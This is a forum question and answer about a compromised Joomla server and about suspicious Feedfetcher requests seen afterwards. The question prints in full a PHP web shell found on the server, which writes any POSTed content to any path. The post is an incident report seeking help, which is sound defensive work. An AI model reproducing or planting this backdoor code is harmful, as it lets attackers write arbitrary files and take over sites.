Assad Ullah asked:
My server was recently been compromised due to Joomla and allow_url_fopen = ON I see various php files on my server root having this content in them
Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh);
so I close allow_url_fopen and delete all of these files. Now, my site is running fine for few minutes but it make requests for every few seconds to this address with giving this message in error_log
[Thu Mar 07 00:14:00 2013] [error] [client 184.108.40.206] File does not exist: /var/www/html/index.xml
This I see in access_log lots of time
220.127.116.11 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)";
So is it normal?
Looks like someone’s abusing Google App Engine. Check your Apache access log for that IP address, and the user agent string should have their app ID. You can then report the abuse to Google.
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.